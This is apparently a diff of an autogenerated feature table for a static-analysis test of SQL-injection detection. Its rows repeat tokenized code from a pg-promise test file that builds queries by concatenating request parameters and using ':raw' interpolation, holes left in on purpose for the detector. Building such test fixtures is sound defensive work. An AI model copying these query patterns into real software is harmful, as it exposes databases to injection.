text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:15 | exceptional return of db.one(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:3:16:15 | exceptional return of db.one(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:6:16:8 | one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:6:16:8 | one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:6:16:8 | one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:6:16:8 | one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:6:16:8 | one | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:10:16:14 | query | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:10:16:14 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:10:16:14 | query | calleeImports | pg-promise | @@ -3573,6 +17722,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:10:16:14 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:10:16:14 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:16:10:16:14 | query | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:14 | db.oneOrNone | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:14 | db.oneOrNone | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:14 | db.oneOrNone | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:14 | db.oneOrNone | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:14 | db.oneOrNone | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:21 | db.oneOrNone(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:21 | db.oneOrNone(query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:21 | db.oneOrNone(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:21 | db.oneOrNone(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:21 | db.oneOrNone(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:21 | exceptional return of db.oneOrNone(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:21 | exceptional return of db.oneOrNone(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:21 | exceptional return of db.oneOrNone(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:21 | exceptional return of db.oneOrNone(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:3:17:21 | exceptional return of db.oneOrNone(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:6:17:14 | oneOrNone | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:6:17:14 | oneOrNone | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:6:17:14 | oneOrNone | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:6:17:14 | oneOrNone | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:6:17:14 | oneOrNone | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:16:17:20 | query | CalleeFlexibleAccessPath | db.oneOrNone | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:16:17:20 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:16:17:20 | query | calleeImports | pg-promise | @@ -3582,6 +17756,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:16:17:20 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:16:17:20 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:17:16:17:20 | query | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:10 | db.query | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:10 | db.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:10 | db.query | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:10 | db.query | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:10 | db.query | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:17 | db.query(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:17 | db.query(query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:17 | db.query(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:17 | db.query(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:17 | db.query(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:17 | exceptional return of db.query(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:17 | exceptional return of db.query(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:17 | exceptional return of db.query(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:17 | exceptional return of db.query(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:3:18:17 | exceptional return of db.query(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:6:18:10 | query | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:6:18:10 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:6:18:10 | query | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:6:18:10 | query | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:6:18:10 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:12:18:16 | query | CalleeFlexibleAccessPath | db.query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:12:18:16 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:12:18:16 | query | calleeImports | pg-promise | @@ -3591,6 +17790,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:12:18:16 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:12:18:16 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:18:12:18:16 | query | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:11 | db.result | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:11 | db.result | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:11 | db.result | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:11 | db.result | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:11 | db.result | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:18 | db.result(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:18 | db.result(query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:18 | db.result(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:18 | db.result(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:18 | db.result(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:18 | exceptional return of db.result(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:18 | exceptional return of db.result(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:18 | exceptional return of db.result(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:18 | exceptional return of db.result(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:3:19:18 | exceptional return of db.result(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:6:19:11 | result | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:6:19:11 | result | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:6:19:11 | result | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:6:19:11 | result | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:6:19:11 | result | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:13:19:17 | query | CalleeFlexibleAccessPath | db.result | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:13:19:17 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:13:19:17 | query | calleeImports | pg-promise | @@ -3600,6 +17824,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:13:19:17 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:13:19:17 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:19:13:19:17 | query | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:21:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:21:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:21:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:21:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:21:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:21:8 | db.one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:21:8 | db.one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:21:8 | db.one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:21:8 | db.one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:21:8 | db.one | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:23:4 | db.one( ... OK\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:23:4 | db.one( ... OK\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:21:3:23:4 | db.one( ... OK\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * 